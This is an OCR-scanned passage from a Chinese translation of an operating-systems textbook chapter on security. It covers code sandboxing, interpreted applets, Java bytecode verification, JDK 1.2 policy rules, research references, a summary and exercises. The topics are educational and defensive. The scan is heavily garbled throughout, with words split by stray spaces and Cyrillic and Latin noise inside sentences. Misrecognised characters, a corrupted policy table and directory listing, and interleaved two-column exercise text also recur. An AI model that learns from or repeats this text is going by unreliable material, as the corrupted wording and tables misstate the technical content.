同样 ， 相 对 JMP 指 令 也 很 容易 检查 。 如 果 Applet 含 有 要 试 图 9-37 а) 内 存 被 划分 为 16 MB 的 沙 盒 ， 
图 离开 代码 沙 盒 的 代码 , 它 就 会 被 拒绝 并 不 予 执行 。 同 样 ， у ЕРНИН 

试图 接 航 外 界 数据 的 Applet 也 会 被 拒绝 。 入 

最 困难 的 是 动态 JMP。 大 多 数 计算 机 都 有 这 样 一 条 指令 ， 该 指令 中 要 跳 转 的 目标 地 址 在 运行 的 时 候 
计算 ， 该 地 址 被 存 和 一 寄存 器 ， 然 后 间接 跳 转 。 例 如 ， 通 过 JMP (R1) 跳 转 到 寄存 器 1 里 存放 的 地 址 。 
这 种 指令 的 有 效 性 必须 在 运行 时 检查 。 检 查 时 ， 系 统 直接 在 间接 跳 转 之 前 插入 代码 ， 以 便 测试 目标 地 址 。 
这 样 测试 的 一 个 例子 如 图 9-37b 所 示 。 请 记 住 ， 所 有 的 有 效 地 址 都 有 同样 的 高 4 位 地 址 ， 所 以 该 地 址 前 级 
被 存放 在 临时 寄存 器 里 ， 如 说 S2。 这 样 的 寄存 器 不 能 被 Applet 白 身 使 用 ， 因为 Applet 有 可 能 要 求 重 写 寄 
存 器 以 避免 受 该 寄存 器 限制 。 

有 关 代码 是 按 如 下 工作 的 : 首先 把 被 检查 的 目标 地 址 复制 到 临时 寄存 器 S1 中 。 然后 该 寄存 器 向 右 
移 位 正好 将 S1 中 的 地 址 前 缀 隔离 出 来 。 第 二 步 将 隔离 出 的 前 缓 同 原先 装 入 S2 寄 存 器 里 的 正确 前 组 进行 
比较 。 如 果 不 匹 配 就 激活 陷阱 程序 杀 死 进程 。 这 段 代码 序 列 需要 四 条 指令 和 两 个 临时 寄存 器 。 

对 运行 中 的 二 进 制程 序 打 补丁 需要 一 些 工作 ， 但 却 是 可 行 的 。 如 果 Applet 是 以 源 代码 形式 出 现 ， 工 
作 就 容易 得 多 。 随 后 在 本 地 的 编译 器 对 Applet 进 行 编译 ， 自动 查看 静态 地 址 并 插入 代码 来 校 验 运 行 中 的 
动态 地 址 。 同 样 也 需要 一 些 运行 时 间 的 开销 以 便 进 行动 态 校 验 。Wahbe 等 人 (1993) 估计 这 方面 的 时 间 
大 约 占 4%， 这 一 般 是 可 接受 的 。 

另 一 个 要 解决 的 问题 是 当 Applet 试 图 进行 系统 调用 时 会 发 生 什么 ? 解决 方法 是 很 直接 的 。 系 统 调用 的 
指令 被 一 个 叫做 基准 监视 器 的 特殊 模块 所 替代 ， 这 一 模块 采用 了 与 动态 地 址 校 验 相同 的 检查 方式 (或 者 ， 
如 果 有 源 代码 ， 可 以 链接 一 个 调用 基准 监视 器 的 库 文件 ， 而 不 是 执行 系统 调用 ) 。 在 这 两 个 方法 中 ， 基 准 
监视 器 检查 每 一 个 调用 企图 ， 并 决定 该 调用 是 否 可 以 安全 执行 。 如 果 认 为 该 调用 是 可 接受 的 ， 如 在 指定 的 
暂 存 目录 中 写 临 时 文件 ， 这 种 调用 就 可 以 执行 。 如 果 调 用 被 认为 是 危险 的 或 者 基准 监视 器 无 法 判断 ， 
Applet 就 被 终止 。 若 基准 监视 器 可 以 判断 是 哪 一 个 Applet 执 行 的 调用 ， 内 存 里 的 一 个 基准 监视 器 就 能 处 理 
所 有 这 样 Applet 的 请 求 。 基 准 监视 器 通常 从 配置 文件 中 获知 是 否 允 许 执行 。 

2. 解 释 

第 二 种 运行 不 安全 Applet 的 方法 是 解释 运行 并 阻止 它们 获得 对 硬件 的 控制 。Web 浏 览 器 使 用 的 就 是 
这 种 方法 。 网 页 上 的 Applet 通 常 是 用 Java 写 的 ，Java 可 以 是 一 种 普通 的 编程 语言 ， 也 可 以 是 高 级 脚本 语 
言 ， 如 安全 TCL 语 言 或 Javascript。Java Applet 首 先 被 编译 成 一 种 叫做 JVM (Java 虚 拆 机 ，Java Virtual 
Machine) 的 面向 栈 的 机 器 语言 。 正 是 这 些 JVM Applet 被 放 在 网 页 上 ， 当 它们 被 下 载 时 就 插入 到 浏览 器 
内 置 的 JVM 解 释 器 中 ， 如 图 9-38 所 示 。 

使 用 解释 运行 的 代码 比 编译 运行 的 代码 好 处 在 于 ， 每 一 条 指令 在 执行 前 都 由 解释 器 进行 检查 。 这 就 
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给 了 解释 器 识别 校 验 地 址 是 否 有 效 的 机 会 。 另 外 ， 系 统 调用 也 可 以 被 捕捉 并 解释 。 这 些 调用 的 处 理 方式 
与 安全 策略 有 关 。 例 如 ， 如 果 Applet 是 可 信任 的 (如 来 虚拟 地 址 空间 

自 本 地 磁盘 的 Applet) ， 它 的 系统 调用 就 可 以 毫 无 疑问 。 oOxFFFFFFFF 

会 被 执行 。 但 是 如 果 Applet 不 受信 任 (如 来 自 Internet 的 不 可 信 
Applet) ， 它 就 会 被 放 入 沙 盒 来 限制 自身 的 行为 。 人 


高 级 脚本 语言 也 能 够 被 解释 执行 。 这 里 ， 解 释 执 行 -二 
不 需要 机 器 地 址 ， 所 以 也 就 不 存在 脚本 以 不 允许 的 方式 Ката). a 


юй: 
访问 内 存 所 带 来 的 危险 。 解 释 运行 的 缺点 是 ， 它 与 编译 иза Appler 
运行 的 代码 相 比 十 分 缓慢 。 
0 


9.8.7 Java 安 全 性 

人 们 设计 了 Java 编 程 语言 和 相关 的 运行 时 系统 ， 是 图 9-38 Applet 可 以 被 Web 浏 览 器 
为 了 一 次 编写 并 编译 后 就 能 够 在 Interent 上 以 二 进 制 代 码 以 解释 方式 执行 
的 形式 运行 在 所 有 支持 Java 的 机 器 上 。 从 一 开始 设计 
Java 语 言 开始 ， 安 全 性 就 成 为 其 重要 的 一 部 分 。 在 这 一 小 节 ， 我 们 来 看 看 它 的 工作 原理 。 

Java 是 一 种 在 类 型 上 安全 的 编程 语言 ， 也 就 是 说 编译 器 会 拒绝 任何 与 自身 类 型 不 一 致 的 变量 使 用 。 
而 C 语 言 正好 相反 ， 请 看 下 面 的 代码 : 

naughty func() 

{ 

char *р; 
p=rand(); 
p=0; 

› 

代码 把 产生 的 随机 数 放 在 指针 p 中 。 然 后 把 0 字 节 存储 在 p 所 包含 的 地 址 中 ， 覆 盖 了 地 址 里 原先 的 任 
何 代码 和 数据 。 而 在 Java 中 ， 混 合 使 用 类 型 的 语句 是 被 语法 所 禁止 的 。 而 且 ，Java 没 有 指针 变量 、 类 型 
转换 、 用 户 控制 的 存储 单元 分 配 (如 malloc 和 free) ， 并 且 所 有 的 数组 引用 都 要 在 运行 时 进行 校 验 。 

Java 程 序 被 编译 成 一 种 叫做 JVM (Java Virtual Machine) 字 节 码 的 中 间 形 态 二 进 制 代 码 。JVM 有 大 
约 100 个 指令 ， 大 多 数 指令 是 把 不 同类 型 的 对 象 压 和 人 栈 、 弹 出 栈 或 是 用 算术 合并 栈 里 的 对 象 。 这 些 JVM 
程序 通常 是 解释 执行 程序 ， 虽 然 在 某 些 情况 下 它们 可 以 被 编译 成 机 器 语言 以 便 执行 得 更 快 。 在 Java 模 式 
中 ， 通 过 Internet 发 送 到 远程 计算 机 上 运行 的 Applet 是 JVM 程 序 。 

当 Applet 到 达 远程 计算 机 时 ， 首 先 由 JVM 字 节 码 校 验 器 查看 Applet 是 否 符合 规则 。 正 确 编译 的 
Applet 会 自动 符合 规则 ， 但 无 法 阻止 一 个 恶意 的 用 户 用 汇编 语言 写 JVM 格 式 的 Applet。 校 验 的 规则 包括 ; 

1) Applet 是 否 伪造 了 指针 ? 

2) 是 否 违背 了 私有 类 成 员 的 访问 限制 ? 

3) 是 否 试图 把 某 种 类 型 的 变量 用 作 其 他 类 型 ? 

4) ERER Ете? 

5) 是 否 非法 地 将 变量 从 一 种 类 型 转换 为 另 一 种 类 型 ? 

如 果 Applet 通 过 了 所 有 的 测试 ， 它 就 能 被 安全 地 执行 并 且 不 用 担心 它 会 访问 非 自 己 所 有 内 存 空间 。 

但 是 Applet 也 可 以 通过 调用 Java 方 法 (过程 ) 来 执行 系统 调用 。Java 处 理 这 种 调用 的 方法 也 在 不 断 
在 进步 。 在 最 初 的 Java 版 本 JDK (Java Development Kit) 1.0 里 ，Applet 被 分 为 两 类 可 信 的 与 不 可 信 的 。 
从 本 地 磁盘 取出 的 Applet 是 可 信和 的 并 被 允许 执行 任何 所 需要 的 系统 调用 。 相 反 ， 从 Internet 获 取 的 Applet 
是 不 可 信 的 。 它 们 被 限制 在 沙 盒 里 运行 ， 如 图 9-38 所 示 ， 实 际 上 并 不 能 做 什么 事 。 

在 从 这 一 模式 中 取得 了 些 经 验 后 ，Sun 公 司 认为 对 Applet 的 限制 大 了 。 在 JDK 1.1 版 本 里 ， 引 入 了 
版 本 标注 。 当 Applet 从 Internet 传 递 过 来 后 ， 系 统 首先 查看 Applet 是 否 有 用 户 信任 的 个 人 或 组 织 标注 Ой 
过 用 户 所 信任 的 标注 者 列表 来 定义 )。 如 果 是 ，Applet 就 被 允许 做 任何 操作 ， 否 则 就 必须 在 沙 僵 里 运行 
并 且 受 到 很 强 的 限制 。 
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在 获取 了 一 些 经 验 后 ， 代 码 标注 也 不 那么 令 人 满意 了 ， 所 以 安全 模式 又 有 了 变化 。JDK 1.2 版 本 提 
供 了 一 套 可 配置 的 严密 的 安全 策略 ， 针 对 包含 本 地 和 异地 所 有 的 Applet。 安 全 模式 非常 复杂 导致 需要 束 
整 一 本 书 来 描述 (Gong, 1999)， 我 们 仅仅 归纳 出 一 些 精 华 的 部 分 。 

每 一 个 Applet 具 有 两 个 特性 ， 来 源 于 何 处 以 及 谁 签署 了 它 。 来 源 于 何 处 是 指 URL， 谁 签署 了 它 是 指 
签名 所 用 的 私 钥 。 每 个 用 户 都 能 创建 包含 规则 列表 的 安全 策略 。 规 则 列 出 了 URL、 签 署 者 ， 对 象 以 及 如 
果 Applet 的 URL 和 签署 者 匹配 规则 时 可 在 对 象 上 执行 的 动作 。 从 概念 上 来 说 ， 上 述 信息 如 图 9-39 所 示 ， 
虽然 真正 的 格式 有 所 不 同 并 且 与 Java 的 类 等 级 有 关 。 


URL | zax леа | w 
www.taxprep.com | TaxPrep | /usr/susan/1040.xls | Read 

* /lustmp/* Read, write | 
Www.microsoftcom | Microsoft | /usr/susan/Office/- | Read, Write, Delete 


图 9-39 JDK 1.2 所 指定 的 某 些 保护 规则 的 实例 


其 中 的 一 种 允许 的 动作 是 访问 文件 。 该 动作 可 以 指定 菜 一 特定 的 文件 或 目录 ， 给 定 目 录 下 的 所 有 文 
件 ， 或 给 定 目录 下 所 有 的 文件 和 子 目 录 的 递归 集合 。 图 9-21 的 三 行 包含 了 3 种 情况 。 在 第 一 行 里， 用 户 
Susan 建 立 了 她 的 许可 文件 ， 这 样 来 自 她 的 税务 预备 用 计算 机 ，www.taxprep.com， 并 由 该 公司 签名 的 
Applet 可 以 访问 位 于 1040.xls 文 件 里 的 她 的 税务 数据 。 这 是 惟一 可 读 的 文件 ， 并 且 任 何其 他 的 Applet 都 不 
能 读 。 而 且 ， 来 自 于 所 有 资源 的 所 有 Applet， 无 论 是 否 签名 ， 都 可 以 读 写 /usr/tmp 中 的 文件 。 

而 且 ，Susan 也 信任 Microsoft， 让 来 自 于 该 公司 站 点 并 签名 过 的 Applet 读 、 写 或 删除 Office 目 录 下 的 
所 有 文件 。 例 如 ， 修 复 bug 并 安装 新 的 软件 版 本 。 为 了 校 验 签名 ， Susan 要 么 在 她 的 磁盘 里 存放 公 钥 ， 要 
么 动态 地 获取 公 钥 ， 例 如， 在 持 有 她 所 信任 的 公司 的 公 钥 以 后 ， 使 用 该 公司 的 签名 证 书 格式 。 

文件 不 是 仅仅 要 保护 的 资源 。 网 络 访问 也 可 以 被 保护 。 被 保护 的 对 象 是 特定 计算 机 的 特定 端口 。 每 
一 台 计算 机 由 一 个 地 址 或 DNS 名 确定 ， 计 算 机 上 的 端口 由 一 排 数字 确定 。 可 能 的 动作 包括 要 求 连接 远 
程 计算 机 以 及 接受 来 自 远程 计算 机 的 连接 。 通 过 这 种 方法 ，Applet 可 以 获得 访问 网 络 的 权限 ， 但 仅 局 限 
于 与 许可 列表 中 明示 的 计算 机 进行 交谈 。Applet 可 以 动态 地 装 入 所 需 的 附加 代码 (Ж), 但 用 户 提供 的 
类 装载 器 可 以 精确 地 控制 由 哪 台 计算 机 产生 这 样 的 类 。 当 然 还 有 其 他 大 量 的 安全 特性 。 


9.9 有 关 安 全 性 研究 

计算 机 安全 性 是 一 个 非常 热门 的 话题 ， 很 多 人 都 在 研究 。 其 中 一 个 重要 的 话题 就 是 可 信 计 算 ， 尤 其 
是 可 信 计 算 的 平台 (Erickson，2003，Garfinkel 等 人 ，2003，Reid 和 Caelli， 2005 以 及 Thibadeau，2006) 
和 相关 的 公共 政策 话题 (Anderson, 2003), 信息 流 的 模型 和 实现 是 一 个 正在 研究 的 话题 (Castro 等 人 ， 
2006，Efstathopoulos 等 人 ，2005，Hicks 等 人 ，2007 和 Zeldovich Л, 2006). 

用 户 验证 (包括 生物 学 识别 ) 仍然 是 很 重要 的 (BhargavSpantzel $A, 2006; Bergadano ЖА, 
2002, Pusara#iBrodley, 2004, Sasse, 2007 以 及 Yoon 等 人 ，2004) 。 

各 种 恶意 软件 被 广泛 地 研究 ， 包 括 特洛伊 木马 (Agrawal 等 人 ，2007，Franz，2007 和 Moffie 等 人 ， 
2006)、 病 毒 (Bruschi 等 人 ，2007，Cheng 等 人 ，2007 和 Rieback 4A, 2006), Ksh (Abdelhafez Л, 
2007，Jiang 和 Xu，2006，Kienzle 和 Elder，2003 以 及 Tang 和 Cheng，2007)、 间 谍 软件 (Egele $A, 
2007，Felten 和 Halderman，2006 以 及 Wu 等 人 ，2006) 和 rootkit (Kruegel 等 人 ，2004，Levine ЖА, 
2006，Quynh 和 Takefuji，2007 以 及 Wang 和 Dasgupta，2007)。 既 然 病 毒 、 间 谍 软件 和 rootkit 都 会 尽力 地 
隐藏 ， 那么 就 会 有 关于 stealth 技 术 的 工作 以 及 它们 怎么 样 才 能 被 侦 测 到 (Carpenter 等 人 ，2007， 
Garfinkel 等 人 ，2007 以 及 Lyda 和 Hamrock，2007)。 加 密 技术 本 身 也 要 被 检查 (Harmsen 和 Pearlman ， 
2005 以 及 Kratzer 等 人 ，2006) 。 


9.10 ”小结 


计算 机 中 经 常会 包含 有 价值 的 机 密 数据 ， 包 括 纳税 申请 单 、 信 用 卡 账号 、 商 业 计划 、 交易 秘密 等 。 
这 些 计算 机 的 主人 通常 非常 渴望 保证 这 些 数据 是 私人 所 有 ， 不 会 被 窜改 ， 这 就 迅速 地 导致 了 我 们 要 求 操 
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КӨЛЕ ВЕ, PREA ВИО УУ АНЕ ЕН СЕА. ТЕТЕВЕН 
信息 的 验证 是 很 重要 的 ， 在 这 种 情况 下 ， 可 以 使 用 加 密 散 列表 、 数 字 签 名 ， 以 及 被 一 个 可 信 的 证 书 验证 
机 构 所 签名 的 证 书 。 

对 信息 的 访问 权限 可 以 模型 化 为 一 个 大 矩阵 ， 行 表示 域 (用 户 )， 列 表示 对 象 文件 )。 每 一 个 元 素 
表示 相应 的 域 对 相应 对 象 的 访问 权限 。 因 为 这 个 矩阵 是 稀疏 的 ， 所 以 它 可 以 按 行 存储 ， 这 样 就 成 了 一 个 
能 力 链 表 ， 表 示 某 一 域 能 够 做 什么 ， 或 者 稀疏 矩阵 也 可 以 按 列 存 储 ， 这 样 就 成 了 一 个 访问 控制 链表 ， 表 
示 谁 并 且 如 何 访问 这 个 对 象 。 使 用 正式 的 建 模 技术 ， 系 统 里 的 信息 流 可 以 被 模型 化 并 受到 限制 。 但 是 ， 


有 时 利用 隐秘 的 通道 还 是 可 以 泄露 出 去 的 ， 比 如 调整 CPU 的 利用 率 。 

在 任何 一 个 安全 的 系统 一 定 要 认证 用 户 。 这 可 以 通过 用 户 知道 的 、 用 户 拥有 的 ， 或 者 用 户 的 身份 
(生物 测定 ) 来 完成 。 使 用 双 因素 的 身份 认证 ， 比 如 虹膜 扫描 和 口令 ， 可 以 加 强 安 全 性 。 

代码 中 有 很 多 bug 可 以 被 利用 来 控制 程序 和 系统 。 这 些 包括 缓冲 区 溢出 、 格 式 串 攻击 、 返 回 libc 攻 击 、 


整数 洲 出 攻击 、 代 码 注 入 攻击 和 特权 扩大 攻击 。 


Internet 上 遍布 恶意 软件 ， 有 特洛伊 木马 、 病 毒 、 蠕 虫 、 间 谍 软 件 和 rookit。 每 一 个 都 对 数据 机 密 性 


和 一 致 性 产生 着 威胁 。 更 粳 料 的 : 
器 用 来 发 送 垃圾 邮件 或 者 发 起 其 他 的 攻击 。 


， 恶 意 软件 攻击 可 能 会 控制 一 台 机 器 ， 并 把 这 台 机 器 变 成 一 台 伪 尸 机 


幸运 的 是 ， 系 统 有 很 多 种 方法 来 保护 自己 。 最 好 的 策略 就 是 全 面 防御 ， 使 用 多 种 技术 一 起 防御 。 这 
些 技 术 有 防火 墙 、 病 毒 扫 描 、 代 码 签 名 、 办 禁 、 入 侵 检测 ， 以 及 封装 移动 代码 。 


习题 


1. 破译 下 列 的 单一 字符 替换 密 文 。 明 文 包含 的 仅 
仅 是 字母 ， 并 且 是 Lewis Carroll 的 著名 诗歌 。 
kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur 
bzha kfthem 
ur mfudm zhx mftnm zhx mdzythc pzq ur 
ezsszcdm zhx gthem 
zhx рѓа kfd mdz tm sutythc fuk zhx pfdkfdi піст 
fzld pthem 
sok pztk z stk kfd uamkdim eitdx sdruid ра fzld 
uoi efzk 
rui mubd ur om zid uok ur sidzkf zhx zyy ur om 
zid rzk 
hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb 
boef rui kfzk 

.假设 有 一 个 私密 密 钥 使 用 了 26 x 26 和 矩阵 行 与 
列 都 以 ABC.…Z 开 头 。 明文 每 次 用 两 个 字符 加 密 。 
第 一 个 字符 是 列 ， 第 二 个 字符 是 行 。 每 个 单元 
由 包含 两 个 密 文字 符 的 行 和 列 交叉 组 成 。 这 样 
的 矩阵 必须 有 些 什么 限制 ? 共有 多 少 个 密 钥 ? 

.私密 密 钥 机 制 比 公 钥 机 制 更 有 效 ， 但 需要 发 送 
者 和 接收 者 事先 共用 一 个 密 钥 。 假 设 发 送 者 和 
接收 者 从 未 碰 到 过 ， 但 有 可 信 的 第 三 方 与 发 送 
方 共享 密 钥 与 接收 方 也 共享 密 钥 ( 另 一 个 ) 。 那 
么 发 送 方 和 接收 方 如 何在 这 种 环境 下 建立 一 个 
新 的 共享 密码 体制 ? 

4. 举 一 个 简单 例子 说 明 一 个 数学 函数 ， 对 一 级 近 


N 


ы 


似 来 说 这 一 函数 是 单 向 函数 。 

5. 假设 有 A 和 B 两 个 陌生 人 想 使 用 对 称 密 钥 加 密 和 
对 方 交流 ， 但 是 没有 共享 对 称 钥匙 。 假 设 他 们 

俩 都 信任 第 三 方 C，C 的 公 钥 是 大 家 都 知道 的 。 
在 这 种 情况 下 两 个 陌生 人 如 何 建立 一 个 新 的 对 

称 密 钥 ? 

-假设 一 个 系统 在 某 时 有 1000 个 对 象 和 100 个 域 。 
在 所 有 域 中 1 多 的 对 象 是 可 访问 的 (r、w 和 x 的 
EHAA), 两 个 域 中 有 10% 的 对 象 是 可 访问 的 ， 
剩 下 89% 的 对 象 只 在 惟一 一 个 域 中 才 可 访问 。 

假设 需要 一 个 单位 的 空间 存储 访问 权 (r、w 和 x 

的 某 种 组 合 ) 、 对 象 ID 或 一 个 域 ID。 分 别 需要 多 
少 空间 存储 全 部 的 保护 矩阵 、 作 为 访问 控制 表 

的 保护 矩阵 和 作为 能 力 表 的 保护 矩阵 ? 

.我 们 讨论 过 的 两 种 保护 机 制 有 能 力 表 和 访问 控 

制 表 。 对 于 下 面 每 个 保护 问题 ， 请 问 应 该 使 用 

哪个 机 制 。 

а) Ken 希 望 除 了 他 的 某 位 办 公 室 的 同事 之 外 ， 
其 他 所 有 人 都 可 以 读 到 他 的 文件 。 

b) Mitch 和 Steve 想 要 共享 一 些 秘密 文件 。 

с) Linda 想 要 她 一 部 分 的 文件 是 公开 的 。 

8. 说 出 在 这 个 UNIX 目 录 里 所 列 保护 矩阵 的 所 有 者 
和 操作 权限 。 请 注意 ，asw 属 于 两 个 组 ，users 
和 devel，gmw 仅 仅 是 users 组 的 成 员 。 把 两 个 成 
员 和 两 个 组 当 作 域 ， 和 矩阵 就 有 四 行 (每 个 域 一 
行 ) 和 四 列 (每 个 文件 一 列 )。 


е 


з 
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Žž t 
мг 2 gmw uses 908 May261645 PPP-Noles 
-IFXF 1 asw devel 432 May131235 рой 
1 asw uses 50094 May301751 projecit 
1 aw devel 13124 May311430 езу 


9. 把 前 一 个 问题 中 的 内 容 作为 访问 列表 ， 说 出 每 
个 所 列 目录 的 操作 权限 。 

10. 在 保护 权限 的 Amoeba 架 构 里 ， 用 户 可 要 求 服 
务 器 产生 一 个 享有 部 分 权限 的 新 权限 ， 并 可 转 
移 给 用 户 的 朋友 。 如 果 该 朋友 要 求 服务 器 移 去 
更 多 的 权限 以 便 转 移 给 其 他 人 的 话 ， 会 发 生 什 
么 情况 呢 ? 

11. 在 图 9-13 里 ， 从 进程 B 到 对 象 1 没有 箭头 。 可 以 
人 允许 存在 这 类 箭头 吗 ? 如 果 存 在 ， 它 破坏 了 什 
么 原则 ? 

12. 如 果 在 图 9-13 里 允许 消息 从 进程 传递 到 进程 ， 
这 样 符合 的 是 什么 原则 ? 特别 对 进程 B 来 说 ， 
它 可 以 对 哪些 进程 发 送 消息 ， 哪 些 不 可 以 ? 

13. 请 看 图 9-16 所 示 的 隐 写 术 。 每 个 像素 由 色彩 空 
间 的 点 表示 ， 该 点 处 在 其 轴 为 R、G、 和 B 值 的 
三 维系 统 中 。 在 使 用 这 个 空间 时 ， 请 解释 在 图 
片 中 如 果 使 用 了 隐 写 术 ， 对 分 辩 素 有 何 影响 ? 

14. 采用 各 种 压缩 算法 ASCII 文 件 里 的 自然 语言 可 
被 压缩 至 少 50%。 如 果 采 用 在 1600 x 1200 图 片 
中 每 个 像素 低位 插入 ASCII 文 本 的 方法 ， 隐 写 
术 可 写 入 的 容量 大 小 为 多 少 个 字 节 ? BHR 
将 增加 到 多 少 (假设 没有 加 密 数 据 也 没有 由 加 
密 带 来 的 扩展 ) ? 这 种 方法 的 效率 即 负载 / 
(所 传送 的 字 节 ) 多 大 ? 

15. 假设 一 组 紧密 联系 的 持 不 同 政见 者 在 被 压制 的 
国家 使 用 隐 写 术 发 送 有 关 该 国 的 状况 消息 到 国 
外 ， 政 府 意识 到 这 一 点 并 发 送 含有 虚假 信息 的 
伪造 图 片 。 这 些 持 不 同 政见 者 如 何 告 诉 人 们 来 
区 分 真实 的 消息 和 错误 的 消息 ? 

16. 去 www.cs.vu.nl/ast 网 站 点 击 covered writing 链 
接 。 按 照 指令 抽取 剧本 。 回 答 下 面 的 问题 : 
(а) 原始 的 斑马 纹 和 竹马 纹 文件 的 大 小 是 多 少 ? 
(b) 班 马 纹 文件 中 秘密 地 存储 了 什么 剧本 ? 

(с) 得 马 纹 文件 中 秘密 地 存储 了 多 少 字 节 ? 

17. 让 计算 机 不 回 显 密码 比 回 显 星 号 安全 些 。 因 为 
回 显 出 星 号 会 让 屏幕 周围 的 人 知道 密码 的 长 
度 。 假 设 密码 仅 包括 大 小 写字 母 和 数字 ， 窗 码 
长 度 必须 大 于 5 个 字符 小 于 8 个 字符 ， 那 么 在 不 
出 现 回 显 时 有 多 安全 ? 

18. 在 得 到 学 位 证 书后 ， 你 申请 作为 一 个 大 学 计算 
中 心 的 管理 者 。 这 个 计算 中 心 正好 淘汰 了 旧 的 
主机 ， 转 用 大 型 的 LAN 服 务 器 并 运行 UNIX 系 


统 。 你 得 到 了 这 个 工作 。 工 作 开始 15 分 钟 后 ， 
你 的 助理 冲 进来 叫 道 , ”有 的 学 生发 现 了 我 们 
用 来 加 密 密 码 的 算法 并 贴 在 Internet。” 那 么 你 
该 怎么 办 ? 

19. Morris-Thompson 采 用 n 位 随机 码 ( 盐 ) 的 保护 
模式 使 得 入 侵 者 很 难 发 现 大 量 事先 用 普通 字符 
串 加 密 的 密码 。 当 一 个 学 生 试图 从 自己 的 计算 
机 上 猜 出 超级 用 户 密码 时 ， 这 一 结构 能 提供 安 
全 保护 吗 ? 假设 密码 文件 是 可 读 的 。 

20. 请 解释 UNIX 口 令 机 制 与 加 密 原 理 的 不 同 。 

21. 假设 一 个 黑客 可 以 得 到 一 个 系统 的 密码 文件 。 
系统 使 用 有 mn 位 salt 的 Morris-Thompson 保 护 机 
制 的 情况 相对 于 没有 使 用 这 种 机 制 的 情况 下 ， 
黑客 需要 多 少 额外 的 时 间 破 解 所 有 密码 。 

22. 请 说 出 3 个 有 效 地 采用 生物 识别 技术 作为 登录 
认证 的 特征 。 

23. 某 个 计算 机 科学 系 有 大 量 的 在 本 地 网 络 上 的 
UNIX 机 器 。 任 何 机 器 上 的 用 户 都 可 以 以 


rexec machine4 who 


的 格式 发 出 命令 并 在 machine4 上 执行 ， 而 不 用 
远程 登录 。 这 一 结果 是 通过 用 户 的 核心 程序 把 
命令 和 UID 发 送 到 远程 计算 机 所 完成 的 。 在 这 
一 系统 中 ， 核 心 程序 是 可 信任 的 吗 ? 如果 有 些 
计算 机 是 学 生 的 无 保护 措施 的 个 人 计算 机 呢 ? 
24. 在 UNIX 系 统 里 使 用 密码 与 Lamport 登 录 到 非 安 
全 网 络 的 架构 有 何 相同 点 ? 

25.Lamport 的 一 次 性 密码 技术 采用 的 逆序 密码 。 
这 种 方法 比 第 一 次 用 f (s)， 第 二 次 用 f (f(s) 并 
依次 类 推 的 方法 更 简单 吗 ? 

26. 使 用 MMU 硬 件 来 阻止 如 图 9-24 的 溢出 攻击 可 

行 吗 ? 解释 为 什么 ? 

27. 请 列 出 C 编 译 器 的 一 种 可 大 量 减 少 安全 漏洞 的 

特性 。 为 什么 这 种 特性 没有 被 广泛 使 用 ? 

28. 特洛伊 木马 可 以 在 由 权限 保护 的 系统 中 工作 吗 ? 

29. 在 删除 文件 时 ， 文 件 块 被 放 回 空闲 块 列表 ， 但 

并 没有 被 清除 。 你 认为 让 操作 系统 在 释放 之 前 
首先 清除 每 个 文件 块 是 个 好 办 法 吗 ? 请 从 这 两 
种 做 法 的 安全 性 和 性 能 分 别 考 虑 ? 并 解释 每 种 
操作 的 效果 ? 

30. 寄生 病毒 如 何 保证 a) 在 主 程序 运行 前 自己 先 
运行 ? b) 完成 自己 的 操作 后 把 控制 权 交 还 给 
主 程序 ? 

.有些 操作 系统 需要 在 磁道 的 开始 处 设置 磁盘 分 
区 。 这 对 引导 区 病毒 来 说 有 什么 便利 ? 

32. 改变 图 9-27 所 示 的 程序 ， 让 它 找到 所 有 的 C 语 
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言 程序 而 不 是 可 执行 程序 。 43. 要 校 验 Applet 是 否 由 可 信 的 供应 商标 记 ， 
33. 图 9-32d 所 示 的 病毒 被 加 密 过 。 反 病毒 实验 室 Applet 供 应 商 可 以 提供 由 可 信 第 三 方 签署 的 证 
的 科学 家 如 何 判断 哪 部 分 文件 是 加 密 密 钥 以 便 书 ， 其 中 包括 其 公 钥 。 但 是 读 取证 书 用 户 需 要 
能 够 解密 病毒 代码 并 反 向 恢复 ?Virgil 如 何 才 可 信 第 三 方 的 公 钥 。 这 可 由 第 四 方 提供 ,但 是 
能 让 这 些 科 学 家 的 工作 更 困难 ? 用 户 又 需要 第 四 方 的 公 钥 。 这 看 上 去 没有 办 法 
34. 图 9-32c 的 病毒 同时 有 压缩 程序 和 解压 缩 程序 。 解决 验证 系统 , 然而 实际 上 浏览 器 却 可 以 做 到 。 
解压 缩 程序 用 来 展开 并 运行 被 压缩 的 可 运行 程 为 什么 ? 
序 ， 那 么 压缩 程序 用 来 做 什么 呢 ? 44. 描述 使 得 Java 成 为 比 C 能 写 出 更 安全 的 程序 的 
35. 从 病毒 制作 者 的 观点 出 发 ， 说 出 多 形态 加 密 病 编程 语言 的 三 个 特征 。 
毒 的 一 个 缺点 。 45. 假设 你 的 系统 使 用 IDK 1.2。 给 出 允许 一 个 来 自 
36. 通常 人 们 把 下 列 操作 看 作 是 受到 病毒 攻击 后 的 www.appletsRus.com 的 小 应 用 程序 在 你 的 机 器 上 
恢复 措施 : 运行 时 你 使 用 的 规则 (类 似 图 9-39 中 的 那些 规 
a) 启动 被 感染 的 系统 。 则 )。 这 个 小 应 用 程序 可 能 从 wwwappletsRus com 
b) 把 所 有 文件 备份 到 外 部 存储 介质 。 中 下 载 额外 的 文件 ， 在 /usr/tmp/ 中 读 写 文件 ， 也 
c) 运行 fdisk 格 式 化 磁盘 。 从 /usrime/appletdir 中 读 文 件 。 
d 从 原版 的 CD-ROM 重 新 安装 操作 系统 。 46. 用 C 语 言 或 shell 丢 本 写 一 对 程序 ， 通 过 UNIX 系 
е) 从 外 部 存储 介质 重新 装 和 人 文件。 统 里 的 隐藏 信道 来 发 送 和 接收 消息 。 提 示 : 即 
请 说 明 上 述 操作 中 的 两 个 错误 。 使 当 文 件 不 可 访问 时 也 可 以 看 到 许可 位 ， 通 过 
37. 在 UNIX 里 可 能 存在 共事 者 病毒 吗 (不 改动 已 设置 其 参数 的 方法 ， 确 保 sleep 命 令 或 系统 调用 
有 文件 的 病毒 ) ?如 果 可 能 ， 为 什么 ?如 果 不 被 延迟 一 段 固定 的 时 间 。 请 度量 在 一 个 空 闪 系 
可 能 ， 为 什么 ? 统 上 的 数据 率 ， 然 后 通过 启动 大 量 的 各 种 后 台 
38. 病毒 和 蠕虫 的 区 别 是 什么 ?它们 分 别 是 如 何 繁 进程 来 人 为 创建 较 大 的 负载 ， 再 次 计算 数据 率 。 
殖 的 ? 47. 一 些 UNIX 系 统 使 用 DES 算 法 加 密 密 码 。 这 些 
